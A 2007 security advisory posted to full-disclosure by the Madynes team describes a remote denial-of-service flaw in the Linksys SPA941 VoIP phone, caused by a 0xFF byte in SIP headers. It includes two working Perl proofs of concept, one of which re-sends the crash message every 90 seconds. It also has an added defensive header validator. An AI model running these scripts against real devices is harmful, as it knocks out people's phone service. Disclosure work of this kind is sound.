Message-ID: <015e01c7866c$e5ed1ba0$071a5198@Crocodile>
Date: Tue, 24 Apr 2007 14:34:27 +0200
From: "Radu State" <state@...ia.fr>
To: <full-disclosure@...ts.grok.org.uk>
Subject: Linksys SPA941 remote DOS with \377 character

MADYNES Security Advisory

http://madynes.loria.fr

Title: Linksys SPA941 remote DOS with \377 character

Discovery Date: 01/02/2007
Vendor notification: 4/04/2007 and 17/04/2007
Release Date: 24/04/2007

Severity: Moderate - Denial of Service

Advisory ID: KIHP3

Vulnerability in Linksys SPA941

Synopsis: After receiving a crafted SIP message the device immediately
reboots. The phone does not properly check for the metacharacter \377 in
SIP header fields.

The vendor was informed and fixed firmware will be made available. This
vulnerability was identified by the Madynes research team at INRIA Lorraine,
using the Madynes VoIP fuzzer.


Background: SIP is the IETF standardized protocol (RFCs 2543 and 3261) for
VoIP signalling. SIP is ASCII based; its INVITE message is used to initiate
and maintain a communication session.

 


Configuration of our device:

* Software Version: 5.1.5
* IP address obtained by DHCP: 192.168.1.107
* User Name: linksys

Vulnerability:

The phone may reboot and/or reply with invalid messages. It is not able to
handle the character \377 (a byte with all bits set) in a message. Depending
on where this character is located the phone may reboot (e.g. when it appears
in any part of the FROM header). Located anywhere else, it may modify the
content of the reply messages generated by the phone, as shown in exploit 1.
It looks like a format string vulnerability, but no effort was made to
investigate the firmware.
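As an added example (not part of the advisory or of the Madynes tooling), the check the phone evidently lacks: a defender-side validator that splits a SIP datagram into start line and header fields and names the fields carrying bytes RFC 3261 does not allow there, so a 0xFF can be rejected or logged before it reaches a fragile parser. The INVITEs it runs on are constructed samples using documentation addresses, not captured traffic.

```python
import re
from typing import List, Tuple

# Constructed sample, not captured traffic: the advisory's trigger, a 0xFF
# byte inside the From header, in an otherwise ordinary INVITE.
MALFORMED_INVITE = (
    b"INVITE sip:101@192.0.2.10 SIP/2.0\r\n"
    b"Via: SIP/2.0/UDP 192.0.2.20:5060;branch=z9hG4bK00000\r\n"
    b"From: \xff<sip:42@192.0.2.20>;tag=779\r\n"
    b"To: Receiver <sip:101@192.0.2.10>\r\n"
    b"Call-ID: 10@192.0.2.20\r\n"
    b"CSeq: 1 INVITE\r\n"
    b"Content-Length: 0\r\n\r\n"
)
# A legitimate UTF-8 display name must not be flagged (0xC3 0xA9 is "é").
CLEAN_INVITE = MALFORMED_INVITE.replace(b"\xff", b"Ren\xc3\xa9 ")

# RFC 3261 restricts the start line and header names to printable ASCII;
# header values are UTF-8 text, so the test for a value is "decodes as
# UTF-8", which a lone 0xFF byte never does.
PRINTABLE_ASCII = re.compile(rb"\A[\x20-\x7e]*\Z")

def split_message(raw: bytes) -> Tuple[bytes, List[Tuple[bytes, bytes]]]:
    """Split a SIP datagram into its start line and (name, value) headers."""
    head = raw.split(b"\r\n\r\n", 1)[0]        # ignore any message body
    lines = head.split(b"\r\n")
    headers = []
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers.append((name.strip(), value.strip()))
    return lines[0], headers

def find_bad_fields(raw: bytes) -> List[str]:
    """Return the fields a robust SIP parser should reject, in order."""
    start, headers = split_message(raw)
    bad = []
    if not PRINTABLE_ASCII.match(start):
        bad.append("start-line")
    for name, value in headers:
        if not PRINTABLE_ASCII.match(name):
            bad.append("header-name")
            continue
        try:
            value.decode("utf-8")
        except UnicodeDecodeError:
            bad.append(name.decode("ascii"))
    return bad
```

Header folding (continuation lines) is not handled; a production filter would unfold before checking.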



Exploit 1)

In this exploit we set a \377 character before every carriage return. The
replies are modified in their Status line and most of the headers are
erased. Different behaviour exists depending on the quantity of \377
characters and their location. The Linksys IP Phone SPA941 (firmware 5.1.5)
cannot cope with \377 characters in the FROM field when the real source port
(the port in the IP packet) is different from the port in the SIP FROM field.

 


To run exploit 1 the file linksys-5.1.5.pl should be launched (assuming
our configuration) as:

perl linksys-5.1.5.pl 192.168.1.107 5060 linksys

POC 1:

 

#!/usr/bin/perl
# POC 1: a single INVITE with a \377 byte in front of every CRLF.
use strict;
use warnings;
use IO::Socket::INET;

die "Usage $0 <dst> <port> <username>" unless ($ARGV[2]);

my $socket = IO::Socket::INET->new(PeerPort => $ARGV[1],
        Proto    => 'udp',
        PeerAddr => $ARGV[0]) or die "socket: $!";

# "\377" is the octal escape for the 0xFF byte; the line break after each
# "\r" in the source supplies the LF, so every line ends in 0xFF CR LF.
my $msg =
"INVITE sip:$ARGV[2]\@$ARGV[0] SIP/2.0\377\r
Via: SIP/2.0/UDP 192.168.1.2;rport;branch=00\377\r
Max-Forwards: 70\377\r
To: lynksys <sip:$ARGV[2]\@$ARGV[0]>\377\r
From: <sip:tucuman\@192.168.1.2>;tag=00\377\r
Call-ID: tucu\@192.168.1.2\377\r
CSeq: 24865 INVITE\377\r
Contact: <sip:tucu\@192.168.1.2>\377\r
Supported: 100rel\377\r
Content-Length: 0\377\r
\r\n";

$socket->send($msg);

 

 

 

 

Exploit 2)

In order to remotely reboot the phone the following POC will work.

If the phone is called with POC 2 it will ring. When the call is answered
the phone reboots immediately; if not, it reboots after some time.

The POC sends the killer message every 90 seconds (the time needed for a
reboot) and so performs an effective DOS. It also opens a socket on the
local machine to avoid sending RST to the phone; the same can be obtained
with a firewall or netcat.

POC 2:

Command: perl script.pl <username> <dst_IP> <SourceIp> <sourceport>
         Eg. perl script.pl 101 152.81.114.195 152.81.12.93 5060

Script Code:

 

#!/usr/bin/perl
# POC 2: re-send an INVITE carrying a \377 byte in the From header every
# 90 seconds, so the phone is hit again each time it comes back up.
use strict;
use warnings;
use IO::Socket;

die "Usage $0 <username> <dst_IP> <SourceIp> <sourceport>" unless
($ARGV[3]);

my $touser        = $ARGV[0];
my $target        = $ARGV[1];
my $sourceaddress = $ARGV[2];
my $sourceport    = $ARGV[3];

# Listener bound to <SourceIp>:<sourceport>, the address the Via header
# advertises, so the local machine accepts the phone's replies.
my $sock = IO::Socket::INET->new(LocalHost => $sourceaddress,
        LocalPort => $sourceport, Proto => 'udp')
        or die "no socket :$!";

# The INVITE itself leaves from local port 5061.
my $socket = IO::Socket::INET->new(PeerAddr => $target, PeerPort => '5060',
        Proto => 'udp', LocalAddr => $sourceaddress, LocalPort => '5061')
        or die "no socket :$!";

my $high = 2000;
my $low  = 1;
my $fromuserid = int(rand($high - $low + 1)) + $low;   # random From user
my $cseq = "INVITE";

# "\377" is the octal escape for the 0xFF byte that triggers the reboot;
# the line break after each "\r" in the source supplies the LF.
my $msg = "INVITE sip:$touser\@$target SIP/2.0\r
Via: SIP/2.0/UDP $sourceaddress:$sourceport;branch=z9hG4bK00000\r
From: \377<sip:$fromuserid\@$sourceaddress>;tag=779\r
To: Receiver <sip:$touser\@$target>\r
Call-ID: 10\@$sourceaddress\r
CSeq: 1 $cseq\r
Contact: 779 <sip:$fromuserid\@$sourceaddress>\r
Expires: 1200\r
Max-Forwards: 70\r
Content-Type: application/sdp\r
Content-Length: 133\r
\r
v=0\r
o=0 0 0 IN IP4 $sourceaddress\r
s=Session SDP\r
c=IN  IP4 $sourceaddress\r
t=0 0\r
m=audio 9876 RTP/AVP 0\r
a=rtpmap:0 PCMU/8000\r";

while (1) {
    $socket->send($msg);
    sleep 90;    # the time the phone needs to reboot
}

 

 

Impact:

A malicious user can remotely crash the phone and perform a denial of
service attack by sending a single crafted SIP message. This is conceptually
similar to the "ping of death".

 

Resolution:

Fixed firmware will be made available. Deployments that follow recommended
best practices (i.e. segregating VoIP traffic from data traffic) will be
protected from malicious traffic in most situations.

 

From Linksys' response we include the following resolution: This style of
attack, limited to a single end point and executed from behind a secure
firewall, should not affect an entire network and in most cases should
easily be contained by the local network management entity. Linksys will
directly address this issue with a future release of the phone firmware.

 

 

Distribution: The advisory will be posted on the following website:

madynes.loria.fr

The advisory will be posted to the following mailing lists:

Voipsec: voipsec@...psa.org
Full-Disclosure: full-disclosure@...ts.grok.org.uk

 

 

Credits:

    Balamurugan Karpagavinayagam (Software engineer)
    Humberto J. Abdelnur (Ph.D Student)
    Radu State (Ph.D)
    Olivier Festor (Ph.D)

This vulnerability was identified by the Madynes research team at INRIA
Lorraine, using the Madynes VoIP fuzzer.

 

 

 

Information about us: Madynes is a research team at INRIA Lorraine working
on VoIP Security assessment, intrusion detection and prevention.

 

 

 

